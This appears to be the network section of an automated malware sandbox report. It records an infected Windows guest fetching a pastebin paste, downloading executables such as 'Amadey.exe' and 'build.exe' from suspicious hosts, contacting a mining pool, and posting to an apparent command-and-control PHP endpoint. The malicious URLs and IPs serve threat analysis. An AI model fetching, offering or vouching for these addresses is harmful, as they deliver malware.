Network Analysis
IP Address | Status | Action |
---|---|---|
104.20.68.143 | Active | Moloch |
104.21.35.235 | Active | Moloch |
104.21.79.27 | Active | Moloch |
104.21.93.225 | Active | Moloch |
107.167.110.211 | Active | Moloch |
121.254.136.9 | Active | Moloch |
131.153.76.130 | Active | Moloch |
148.251.234.93 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.186.120 | Active | Moloch |
172.67.187.122 | Active | Moloch |
185.154.192.128 | Active | Moloch |
193.42.32.29 | Active | Moloch |
45.130.41.101 | Active | Moloch |
69.48.143.183 | Active | Moloch |
85.217.144.143 | Active | Moloch |
- TCP Requests
-
-
192.168.56.101:49162 104.20.68.143:443pastebin.com
-
192.168.56.101:49172 104.21.35.235:443potatogoose.com
-
192.168.56.101:49175 104.21.79.27:443thegrandduck.org
-
192.168.56.101:49166 104.21.93.225:443flyawayaero.net
-
192.168.56.101:49173 107.167.110.211:80net.geo.opera.com
-
192.168.56.101:49174 107.167.110.211:443net.geo.opera.com
-
192.168.56.101:49176 121.254.136.9:80apps.identrust.com
-
192.168.56.101:49199 131.153.76.130:80pool.hashvault.pro
-
192.168.56.101:49170 148.251.234.93:443yip.su
-
192.168.56.101:49167 172.67.186.120:443logicmouse.net
-
192.168.56.101:49164 172.67.187.122:443lycheepanel.info
-
192.168.56.101:49177 185.154.192.128:80guboh2p.top
-
192.168.56.101:49190 193.42.32.29:80
-
192.168.56.101:49192 193.42.32.29:80
-
192.168.56.101:49168 45.130.41.101:443laubenstein.space
-
192.168.56.101:49169 69.48.143.183:443martvl.com
-
192.168.56.101:49165 85.217.144.143:80
-
192.168.56.101:49171 85.217.144.143:80
-
- UDP Requests
-
-
192.168.56.101:51901 164.124.101.2:53
-
192.168.56.101:52753 164.124.101.2:53
-
192.168.56.101:52797 164.124.101.2:53
-
192.168.56.101:52815 164.124.101.2:53
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:54883 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:57986 164.124.101.2:53
-
192.168.56.101:58297 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:52756 239.255.255.250:1900
-
GET
200
https://pastebin.com/raw/V6VJsrV3
REQUEST
RESPONSE
BODY
GET /raw/V6VJsrV3 HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 16 Oct 2023 02:05:20 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Mon, 16 Oct 2023 02:05:20 GMT
Server: cloudflare
CF-RAY: 816cbc7778741031-LAX
GET
307
https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe
REQUEST
RESPONSE
BODY
GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: flyawayaero.net
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
Date: Mon, 16 Oct 2023 02:05:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://potatogoose.com/8f4abd327a215517f84d72009a830cea/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z152H1EUswDAjCj03N%2FhQ7KAAYGOuBCCRMbS1DE7maWaAiN%2FNiOJwaK1%2FW6f6KySA57OoksoZOlB84rR%2FVkTokiZhS6HchIZWDSxJX92D8oJ1rlt0Vaw5FQ2mhTG5YUCpGs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 816cbd218c88838a-KIX
alt-svc: h3=":443"; ma=86400
GET
307
https://logicmouse.net/6779d89b7a368f4f3f340b50a9d18d71.exe
REQUEST
RESPONSE
BODY
GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: logicmouse.net
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
Date: Mon, 16 Oct 2023 02:05:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://thegrandduck.org/8f4abd327a215517f84d72009a830cea/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eFgyryTZGHx3NgZOYud%2BDYZNz75xo7D2YTgneVBbhbCwq744ZMMKuTD6I3DoAjGlWY1HU%2BdtOAnncweUE8U3wD52Gz9ZjpeWUaeHKTgKenMuxezhQNG6%2FecF5ZY22FJ4Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 816cbd295d6d8d13-KIX
alt-svc: h3=":443"; ma=86400
GET
200
https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
REQUEST
RESPONSE
BODY
GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Oct 2023 02:05:51 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Content-Disposition: attachment; filename=OperaSetup.exe
ETag: "d6e3673b1f679c7e27f602e50c1949fe"
Strict-Transport-Security: max-age=31536000; includeSubDomains
GET
200
http://85.217.144.143/files/My2.exe
REQUEST
RESPONSE
BODY
GET /files/My2.exe HTTP/1.1
Host: 85.217.144.143
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 16 Oct 2023 02:05:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 12 Oct 2023 02:11:41 GMT
ETag: "53d718-6077b75f2e86b"
Accept-Ranges: bytes
Content-Length: 5494552
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://85.217.144.143/files/Amadey.exe
REQUEST
RESPONSE
BODY
GET /files/Amadey.exe HTTP/1.1
Host: 85.217.144.143
HTTP/1.1 200 OK
Date: Mon, 16 Oct 2023 02:05:47 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Sun, 01 Oct 2023 10:41:57 GMT
ETag: "38800-606a54e8fc226"
Accept-Ranges: bytes
Content-Length: 231424
Content-Type: application/x-msdownload
GET
301
http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
REQUEST
RESPONSE
BODY
GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
Host: net.geo.opera.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 16 Oct 2023 02:05:48 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Mon, 16 Oct 2023 03:05:52 GMT
Date: Mon, 16 Oct 2023 02:05:52 GMT
Connection: keep-alive
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Mon, 16 Oct 2023 03:05:56 GMT
Date: Mon, 16 Oct 2023 02:05:56 GMT
Connection: keep-alive
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Mon, 16 Oct 2023 03:06:01 GMT
Date: Mon, 16 Oct 2023 02:06:01 GMT
Connection: keep-alive
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Mon, 16 Oct 2023 03:06:06 GMT
Date: Mon, 16 Oct 2023 02:06:06 GMT
Connection: keep-alive
GET
200
http://guboh2p.top/build.exe
REQUEST
RESPONSE
BODY
GET /build.exe HTTP/1.1
Host: guboh2p.top
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Oct 2023 02:06:18 GMT
Content-Type: application/octet-stream
Content-Length: 334848
Connection: keep-alive
Last-Modified: Mon, 16 Oct 2023 00:15:00 GMT
ETag: "51c00-607ca4c05f2ed"
Accept-Ranges: bytes
POST
200
http://193.42.32.29/9bDc8sQ/index.php
REQUEST
RESPONSE
BODY
POST /9bDc8sQ/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.42.32.29
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 02:06:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://193.42.32.29/9bDc8sQ/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /9bDc8sQ/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----MjQwODM=
Host: 193.42.32.29
Content-Length: 24235
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 02:06:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49162 104.20.68.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f |
TLS 1.2 192.168.56.101:49164 172.67.187.122:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=lycheepanel.info | 9f:29:fd:d3:0f:46:b4:fc:1f:d0:06:c7:4e:4d:21:d0:21:08:ea:43 |
TLS 1.2 192.168.56.101:49166 104.21.93.225:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=flyawayaero.net | 34:8b:a3:9d:94:c4:8d:02:5c:e1:f1:43:da:57:49:64:a9:1c:b6:fe |
TLS 1.2 192.168.56.101:49167 172.67.186.120:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=logicmouse.net | ad:0f:20:8c:93:a2:c4:29:8c:5a:74:17:2b:40:4b:ee:07:0c:c8:e0 |
TLS 1.2 192.168.56.101:49168 45.130.41.101:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=laubenstein.space | d4:04:82:56:eb:8d:bb:fd:72:7a:36:fd:90:c1:07:aa:45:ac:92:27 |
TLS 1.2 192.168.56.101:49175 104.21.79.27:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=thegrandduck.org | 88:18:17:49:0e:b0:fa:c0:a6:7b:3d:0e:36:55:3a:59:1b:5f:1e:57 |
TLS 1.2 192.168.56.101:49174 107.167.110.211:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=NO, ST=Oslo, L=Oslo, O=Opera Norway AS, CN=net.geo.opera.com | 8b:1e:84:38:9c:97:8c:be:f7:e1:0e:28:14:15:bb:08:cc:fb:ad:af |
TLS 1.2 192.168.56.101:49172 104.21.35.235:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=potatogoose.com | 0f:a9:ea:9d:3e:af:d2:24:68:a0:8f:b7:58:00:c9:0b:f0:7f:31:37 |
TLS 1.3 192.168.56.101:49199 131.153.76.130:80 |
None | None | None |
Snort Alerts
No Snort Alerts